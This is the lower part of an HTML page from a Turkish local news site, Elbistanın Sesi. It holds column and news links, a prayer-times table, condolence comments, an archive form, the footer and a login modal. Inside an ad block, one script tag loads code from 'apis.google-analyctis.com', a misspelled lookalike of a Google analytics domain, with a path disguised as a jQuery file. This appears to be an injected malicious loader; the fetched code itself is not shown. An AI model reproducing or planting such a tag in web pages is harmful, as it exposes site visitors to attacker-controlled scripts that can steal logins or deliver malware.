              <a href="http://www.elbistaninsesi.com/elbistanin-bilinen-koskerlerinin-tamami-makale,6289.html" title="Elbistan’ın bilinen köşkerlerinin tamamı" >Elbistan’ın bilinen köşkerlerinin tamamı</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/tercihiniz-bes-yil-sonranin-ongorusu-makale,6288.html" title="TERCİHİNİZ: BEŞ YIL SONRANIN ÖNGÖRÜSÜ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/yazarlar_koYesi.jpg" alt="Aykut YILDIRIM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/70/aykut-yildirim" title="Aykut YILDIRIM">Aykut YILDIRIM</a></h4>
              <a href="http://www.elbistaninsesi.com/tercihiniz-bes-yil-sonranin-ongorusu-makale,6288.html" title="TERCİHİNİZ: BEŞ YIL SONRANIN ÖNGÖRÜSÜ" >TERCİHİNİZ: BEŞ YIL SONRANIN ÖNGÖRÜSÜ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/elbistan-ve-civarinda-bulunan-tarihi-yapilar-makale,6282.html" title="Elbistan ve Civarında Bulunan Tarihi Yapılar" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/034421b8-4158-4551-83a7-c308f4156fe9.jpg" alt="Orhan SAYDAM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/89/orhan-saydam" title="Orhan SAYDAM">Orhan SAYDAM</a></h4>
              <a href="http://www.elbistaninsesi.com/elbistan-ve-civarinda-bulunan-tarihi-yapilar-makale,6282.html" title="Elbistan ve Civarında Bulunan Tarihi Yapılar" >Elbistan ve Civarında Bulunan Tarihi Yapılar</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/elli-saniye-makale,6281.html" title="ELLİ SANİYE" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Makale.jpg" alt="Meltem Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/53/meltem-gocer" title="Meltem Göçer">Meltem Göçer</a></h4>
              <a href="http://www.elbistaninsesi.com/elli-saniye-makale,6281.html" title="ELLİ SANİYE" >ELLİ SANİYE</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/yasamak-icin-mi-yemek-yemek-icin-mi-yasamak-makale,6267.html" title="YAŞAMAK İÇİN Mİ YEMEK, YEMEK İÇİN Mİ YAŞAMAK" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Nermin-yılmaz-akbalaban.jpg" alt="Nermin Yılmaz Akbalaban">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/96/nermin-yilmaz-akbalaban" title="Nermin Yılmaz Akbalaban">Nermin Yılmaz Akbalaban</a></h4>
              <a href="http://www.elbistaninsesi.com/yasamak-icin-mi-yemek-yemek-icin-mi-yasamak-makale,6267.html" title="YAŞAMAK İÇİN Mİ YEMEK, YEMEK İÇİN Mİ YAŞAMAK" >YAŞAMAK İÇİN Mİ YEMEK, YEMEK İÇİN Mİ YAŞAMAK</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/profdrfuat-sezginin-ardindan-5-makale,6258.html" title="Prof.Dr.Fuat Sezgin’in Ardından -5-" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/6faefd20-9b1e-418c-b102-3b2d1b2c5463.jpg" alt="Adnan YILMAZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/88/adnan-yilmaz" title="Adnan YILMAZ">Adnan YILMAZ</a></h4>
              <a href="http://www.elbistaninsesi.com/profdrfuat-sezginin-ardindan-5-makale,6258.html" title="Prof.Dr.Fuat Sezgin’in Ardından -5-" >Prof.Dr.Fuat Sezgin’in Ardından -5-</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/medar-i-iftiharimiz-cumhurbaskanimiz-baskomutanimiz-sayin-recep-tayyip-erdogan-dan-elbistan-cevresi-bolgesi-dolayisiyla-11-ilcesiyle-birlikte-kahramanmaras-halkinin-allah-rizasi-icin-arz-talep-ve-istirhamini-arzediyor-6-bolge-tesvikinden-yararlanmak-istiy" title="MEDAR-I İFTİHARIMIZ, CUMHURBAŞKANIMIZ, BAŞKOMUTANIMIZ, SAYIN RECEP TAYYİP ERDOĞAN&#039;DAN; ELBİSTAN, ÇEVRESİ, BÖLGESİ, DOLAYISIYLA: 11 İLÇESİYLE BİRLİKTE KAHRAMANMARAŞ HALKININ; ALLAH RIZASI İÇİN: ARZ,  TALEP VE İSTİRHAMINI ARZEDİYOR; 6. BÖLGE TEŞVİKİNDEN YARARLANMAK İSTİYOR!" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gocer_1.jpg" alt="Mehmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/4/mehmet-gocer" title="Mehmet Göçer">Mehmet Göçer</a></h4>
              <a href="http://www.elbistaninsesi.com/medar-i-iftiharimiz-cumhurbaskanimiz-baskomutanimiz-sayin-recep-tayyip-erdogan-dan-elbistan-cevresi-bolgesi-dolayisiyla-11-ilcesiyle-birlikte-kahramanmaras-halkinin-allah-rizasi-icin-arz-talep-ve-istirhamini-arzediyor-6-bolge-tesvikinden-yararlanmak-istiy" title="MEDAR-I İFTİHARIMIZ, CUMHURBAŞKANIMIZ, BAŞKOMUTANIMIZ, SAYIN RECEP TAYYİP ERDOĞAN&#039;DAN; ELBİSTAN, ÇEVRESİ, BÖLGESİ, DOLAYISIYLA: 11 İLÇESİYLE BİRLİKTE KAHRAMANMARAŞ HALKININ; ALLAH RIZASI İÇİN: ARZ,  TALEP VE İSTİRHAMINI ARZEDİYOR; 6. BÖLGE TEŞVİKİNDEN YARARLANMAK İSTİYOR!" >MEDAR-I İFTİHARIMIZ, CUMHURBAŞKANIMIZ, BAŞKOMUTANIMIZ, SAYIN RECEP TAYYİP ERDOĞAN&#039;DAN; ELBİSTAN, ÇEVRESİ, BÖLGESİ, DOLAYISIYLA: 11 İLÇESİYLE BİRLİKTE KAHRAMANMARAŞ HALKININ; ALLAH RIZASI İÇİN: ARZ,  TALEP VE İSTİRHAMINI ARZEDİYOR; 6. BÖLGE TEŞVİKİNDEN YARARLANMAK İSTİYOR!</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/sorular-makale,6245.html" title="SORULAR" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/İsimsiz-2.jpg" alt="Hatice Bacaklı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/99/hatice-bacakli" title="Hatice Bacaklı">Hatice Bacaklı</a></h4>
              <a href="http://www.elbistaninsesi.com/sorular-makale,6245.html" title="SORULAR" >SORULAR</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/uc-maymun-mu-yoksa-erdem-ve-ahlak-mi-makale,6227.html" title="Üç Maymun mu? Yoksa Erdem ve Ahlak mı?" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mikail_Yahin_foto.jpeg" alt="Mikail Şahin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/65/mikail-sahin" title="Mikail Şahin">Mikail Şahin</a></h4>
              <a href="http://www.elbistaninsesi.com/uc-maymun-mu-yoksa-erdem-ve-ahlak-mi-makale,6227.html" title="Üç Maymun mu? Yoksa Erdem ve Ahlak mı?" >Üç Maymun mu? Yoksa Erdem ve Ahlak mı?</a>
            </div>
          </a>
          </div>
              </div>
    </div>
  </div>

  
  <!-- SON DAKIKA VE OZEL HABER -->
  <div class="sonozeltab">

    <ul class="nav nav-tabs" id="sonozel">
      <li class="active"><a href="#sondakika" data-toggle="tab" class="sondakika">Son Dakika</a></li>      <li class=""><a href="#ozelhaber" data-toggle="tab" class="ozelhaber">Özel Haber</a></li>    </ul>

    <div class="tab-content">

            <div class="tab-pane active" id="sondakika">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="http://www.elbistaninsesi.com/guncel/daha-temiz-bir-nurhak-icin-7den-70e-bir-araya-geldiler-h70967.html" title="Daha temiz bir Nurhak için 7’den 70’e bir araya geldiler" >Daha temiz bir Nurhak için 7’den 70’e bir araya geldiler</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/terbuzekteki-kirmizi-benekli-alabalik-olumleri-vatandasi-endiselendiriyor-h70711.html" title="Terbüzek’teki kırmızı benekli alabalık ölümleri vatandaşı endişelendiriyor" >Terbüzek’teki kırmızı benekli alabalık ölümleri vatandaşı endişelendiriyor</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/elbistanda-82-bin-doz-asi-yapildi-h70610.html" title="Elbistan’da 82 bin doz aşı yapıldı" >Elbistan’da 82 bin doz aşı yapıldı</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/besi-osbye-bolge-muduru-alinacak-h70602.html" title="Besi OSB’ye bölge müdürü alınacak" >Besi OSB’ye bölge müdürü alınacak</a></li>
          
          <li class="last"><a href="http://www.elbistaninsesi.com/guncel/tasburundaki-pinar-suyuna-icilemez-raporu-h70435.html" title="Taşburun’daki pınar suyuna içilemez raporu" >Taşburun’daki pınar suyuna içilemez raporu</a></li>
                  </ul>
      </div>
      
            <div class="tab-pane" id="ozelhaber">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="http://www.elbistaninsesi.com/ekonomi/yapalak-santralinin-gelecegini-migemin-gorusu-belirleyecek-h37268.html" title="Yapalak santralinin geleceğini, MİGEMin görüşü belirleyecek" >Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/vefatlar/durmus-ali-yavuz-80-yasinda-h37225.html" title="Durmuş Ali Yavuz 80 yaşında" >Durmuş Ali Yavuz 80 yaşında</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/ekonomi/pancardaki-polar-orani-mahkemelik-oldu-h37167.html" title="Pancardaki polar oranı, mahkemelik oldu" >Pancardaki polar oranı, mahkemelik oldu</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/boyle-saka-gorulmedi-h34847.html" title="Böyle şaka görülmedi!" >Böyle şaka görülmedi!</a></li>
          
          <li class="last"><a href="http://www.elbistaninsesi.com/guncel/eshab-i-kehf-kulliyesine-konaklama-tesisi-h34004.html" title="Eshab-ı Kehf Külliyesine konaklama tesisi" >Eshab-ı Kehf Külliyesi’ne konaklama tesisi</a></li>
                  </ul>
      </div>
      
    </div>
  </div>
  
<!-- NAMAZ VAKITLERI -->
  <div class="namazvakitleri">
    <div class="title">
      <h5>Namaz Vakitleri</h5>
      <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right">
                <option value="adana" >Adana</option>
                <option value="adiyaman" >Adıyaman</option>
                <option value="afyon" >Afyon</option>
                <option value="agri" >Ağrı</option>
                <option value="aksaray" >Aksaray</option>
                <option value="amasya" >Amasya</option>
                <option value="ankara" >Ankara</option>
                <option value="antalya" >Antalya</option>
                <option value="ardahan" >Ardahan</option>
                <option value="artvin" >Artvin</option>
                <option value="aydin" >Aydın</option>
                <option value="balikesir" >Balıkesir</option>
                <option value="bartin" >Bartın</option>
                <option value="batman" >Batman</option>
                <option value="bayburt" >Bayburt</option>
                <option value="bilecik" >Bilecik</option>
                <option value="bingol" >Bingöl</option>
                <option value="bitlis" >Bitlis</option>
                <option value="bolu" >Bolu</option>
                <option value="burdur" >Burdur</option>
                <option value="bursa" >Bursa</option>
                <option value="canakkale" >Çanakkale</option>
                <option value="cankiri" >Çankırı</option>
                <option value="corum" >Çorum</option>
                <option value="denizli" >Denizli</option>
                <option value="diyarbakir" >Diyarbakır</option>
                <option value="duzce" >Düzce</option>
                <option value="edirne" >Edirne</option>
                <option value="elazig" >Elazığ</option>
                <option value="erzincan" >Erzincan</option>
                <option value="erzurum" >Erzurum</option>
                <option value="eskisehir" >Eskişehir</option>
                <option value="gaziantep" >Gaziantep</option>
                <option value="giresun" >Giresun</option>
                <option value="gumushane" >Gümüşhane</option>
                <option value="hakkari" >Hakkari</option>
                <option value="hatay" >Hatay</option>
                <option value="igdir" >Iğdır</option>
                <option value="isparta" >Isparta</option>
                <option value="istanbul" >İstanbul</option>
                <option value="izmir" >İzmir</option>
                <option value="kahramanmaras" selected>Kahramanmaraş</option>
                <option value="karabuk" >Karabük</option>
                <option value="karaman" >Karaman</option>
                <option value="kars" >Kars</option>
                <option value="kastamonu" >Kastamonu</option>
                <option value="kayseri" >Kayseri</option>
                <option value="kirikkale" >Kırıkkale</option>
                <option value="kirklareli" >Kırklareli</option>
                <option value="kirsehir" >Kırşehir</option>
                <option value="kilis" >Kilis</option>
                <option value="izmit" >Kocaeli</option>
                <option value="konya" >Konya</option>
                <option value="kutahya" >Kütahya</option>
                <option value="malatya" >Malatya</option>
                <option value="manisa" >Manisa</option>
                <option value="mardin" >Mardin</option>
                <option value="mersin" >Mersin</option>
                <option value="mugla" >Muğla</option>
                <option value="mus" >Muş</option>
                <option value="nevsehir" >Nevşehir</option>
                <option value="nigde" >Niğde</option>
                <option value="ordu" >Ordu</option>
                <option value="osmaniye" >Osmaniye</option>
                <option value="rize" >Rize</option>
                <option value="adapazari" >Sakarya</option>
                <option value="samsun" >Samsun</option>
                <option value="siirt" >Siirt</option>
                <option value="sinop" >Sinop</option>
                <option value="sivas" >Sivas</option>
                <option value="sanliurfa" >Şanlıurfa</option>
                <option value="sirnak" >Şırnak</option>
                <option value="tekirdag" >Tekirdağ</option>
                <option value="tokat" >Tokat</option>
                <option value="trabzon" >Trabzon</option>
                <option value="tunceli" >Tunceli</option>
                <option value="usak" >Uşak</option>
                <option value="van" >Van</option>
                <option value="yalova" >Yalova</option>
                <option value="yozgat" >Yozgat</option>
                <option value="zonguldak" >Zonguldak</option>
              </select>
    </div>
      <div class="sonuc">

      <table cellspacing="0" cellpadding="0" id="vakitler">
          <tr>
            <th>İmsak</th>
            <th>Güneş</th>
            <th>Öğle</th>
            <th>İkindi</th>
            <th>Akşam</th>
            <th>Yatsı</th>
          </tr>
          <tr>
            <td>04:35</td>
            <td>05:59</td>
            <td>12:36</td>
            <td>16:12</td>
            <td>19:03</td>
            <td>20:22</td>
          </tr>
      </table>


      </div>

  </div>

  <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div>
  <!-- SON YORUMLAR -->
  <div class="son-yorumlar">
    <div class="header">
      <h5>Son Yorumlar</h5>
    </div>
    <div class="content">
      <ul class="unstyled hs-liste add-last">
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/bahtiyar-tas-42-yasinda-h71101.html#comment_357433" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-mustafa-erdal-75-yasinda-h71091.html#comment_357432" title="" >Allah rahmet eylesin Mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hamit-cengel-82-yasinda-h71081.html#comment_357431" title="" >ALLLAH RAHMET EYLESİN MEKANI CENNET TOPRAĞI...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-mustafa-erdal-75-yasinda-h71091.html#comment_357430" title="" >ALLAHrahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-mustafa-erdal-75-yasinda-h71091.html#comment_357429" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ismail-kaya-87-yasinda-h71080.html#comment_357428" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ibrahim-alkilinc-h71076.html#comment_357427" title="" >Allah rahmet eylesin mekânı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ali-gok-48-yasinda-h71066.html#comment_357424" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/meryem-bilgin-96-yasinda-h71067.html#comment_357423" title="" >Bilgin ailesi olarak hepinizden Allah razı...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-mustafa-erdal-75-yasinda-h71091.html#comment_357422" title="" >ALLAH RAHMET EYLESİN BAŞINIZ SAĞOLSUN...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/cuma-yildirim-78-yasinda-h71052.html#comment_357421" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-mehmet-altintop-h71060.html#comment_357420" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fatma-cetin-42-yasinda-h71061.html#comment_357419" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/bayram-gozuacik-86-yasinda-h71062.html#comment_357418" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hasan-gokduman-82-yasinda-h71065.html#comment_357417" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ali-gok-48-yasinda-h71066.html#comment_357416" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/meryem-bilgin-96-yasinda-h71067.html#comment_357415" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ibrahim-alkilinc-h71076.html#comment_357414" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/turan-akbas-38-yasinda-h71078.html#comment_357413" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ismail-kaya-87-yasinda-h71080.html#comment_357412" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
              </ul>
    </div>
  </div>

  
<!-- ARSIV -->
<div class="arsiv">
  <div class="header">
    <h5>Arşiv</h5>
  </div>
  <div class="content">
    <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" >
      <select name="gun" class="day span1">
                <option value="01" >01</option>
                <option value="02" >02</option>
                <option value="03" >03</option>
                <option value="04" selected>04</option>
                <option value="05" >05</option>
                <option value="06" >06</option>
                <option value="07" >07</option>
                <option value="08" >08</option>
                <option value="09" >09</option>
                <option value="10" >10</option>
                <option value="11" >11</option>
                <option value="12" >12</option>
                <option value="13" >13</option>
                <option value="14" >14</option>
                <option value="15" >15</option>
                <option value="16" >16</option>
                <option value="17" >17</option>
                <option value="18" >18</option>
                <option value="19" >19</option>
                <option value="20" >20</option>
                <option value="21" >21</option>
                <option value="22" >22</option>
                <option value="23" >23</option>
                <option value="24" >24</option>
                <option value="25" >25</option>
                <option value="26" >26</option>
                <option value="27" >27</option>
                <option value="28" >28</option>
                <option value="29" >29</option>
                <option value="30" >30</option>
                <option value="31" >31</option>
              </select>
      <select name="ay" class="month span1">
                <option value="01" >Ocak</option>
                <option value="02" >Şubat</option>
                <option value="03" >Mart</option>
                <option value="04" >Nisan</option>
                <option value="05" >Mayıs</option>
                <option value="06" >Haziran</option>
                <option value="07" >Temmuz</option>
                <option value="08" >Ağustos</option>
                <option value="09" selected>Eylül</option>
                <option value="10" >Ekim</option>
                <option value="11" >Kasım</option>
                <option value="12" >Aralık</option>
              </select>
      <select name="yil" class="year span1">
                <option value="2021" selected>2021</option>
                <option value="2020" >2020</option>
                <option value="2019" >2019</option>
                <option value="2018" >2018</option>
                <option value="2017" >2017</option>
              </select>
      <button type="submit" class="btn btn-default span1 pull-right">Ara</button>
    </form>
  </div>
</div>


  


        </div>
        
      </div>

        
                <!-- Sol Dikey Reklam -->
        <div class="reklam dikey sol" style="width:px;height:px;">

                                                                                                                                                                            </div>
        
        <!-- Sağ Dikey Reklam -->
        <div class="reklam dikey sag ortala" style="width:px;height:px;">

                                                                <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- kaynarca -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-3633419220222736"
 data-ad-slot="5807534991"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
 (adsbygoogle = window.adsbygoogle || []).push({});
</script></p>
              
                                                                                                                                                                                                      </div>

        
      </div>

      <!-- FOOTER -->
<div id="siteFooter" class="footer">

      <div class="row-fluid">
      <div class="container center">
        <div class="span4">
          <div>Copyright © 2021 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div>
          <div class="footer-social">
            <a href="https://facebook.com/elbistaninsesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a>
            <a href="https://twitter.com/elbistaninsesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a>
            <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a>
          </div>
        </div>
        <div class="span4 text-center">
          <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Öztunç: “Büyükşehir Belediyesi’ne adayım”" /></a></div>
        </div>
        <div class="span4">
          <p>&lt;center&gt;

0 (344) 415 04 15 &lt;br&gt;
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="67020b050e141306090e091402140e00061d021302140e27000a060e0b4904080a">[email&#160;protected]</a>
&lt;br&gt;Kızılcaoba Mah. Kışla Cad. 19/1&lt;/center&gt;

    </p>          <p><span class="site-info glyphicons earphone" style="padding-left: 0;"></span> 0 (344) 415 04 15</p>        </div>
      </div>
      </div>

      <div id="footer-alt" class="row-fluid">

        <div class="container center">

        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div>
        </div>

        </div>
      </div>



      <div class="row-fluid">
      <div class="container center">
        <div class="span12 text-center">
          <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p>         <a href="https://www.tebilisim.com/" target="_blank" title="haber sistemi, haber scripti, haber yazılımı, tebilişim"><p>Yazılım: TE Bilişim</p></a> 
        </div>
      </div>
      </div>

  <div id="top" class="btn btn-inverse">Yukarı Çık</div>
</div>
      <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
var facebook_paylasim_secret_token, facebook_paylasim_app_id;
facebook_paylasim_app_id = "";
facebook_paylasim_secret_token = "";
if (location.href.match(/\?.*/) && document.referrer) {
   location.href = location.href.replace(/\?.*/, '');
}
</script>
<div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&amp;rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Foztunc-buyuksehir-belediyesine-adayim-h71106.html" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı Adı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı Adı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn hs-sdch btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a>
    <button class="btn hs-sdch btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>




<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/hs-paylas.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/text.js"></script>
<script type="text/javascript">

	new UISearch( document.getElementById( 'sb-search' ) );

	$(function(){
							});

		$("#comment_list .text").pKisalt();
	
		var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML,
	gsSpace   = ' ',
	gsUrl   = location.href;
	$("#paylas").jsSocials({
		url: location.href,
		text: gsTitle,
		showCount: true,
		showLabel: false,
		shares: [
			{ share: "twitter", via: "elbistaninsesi", hashtags: "Elbistanın Sesi" },
            { share: "whatsapp", text: "Bunu bilmelisin!"},
            "facebook",
            "linkedin",
            "pinterest",
			]
		});
							$('#haber > .page-header').waypoint(function(direction) {
		  $('#article-finished').toggleClass('hiding', direction === "up");
		}, {
		  offset: function() {
		    return $.waypoints('viewportHeight') - $(this).height() - 750;
		  }
		});
			var hasBeenClicked = false;
	var kisa_site_adi = "Elbistanın Sesi";
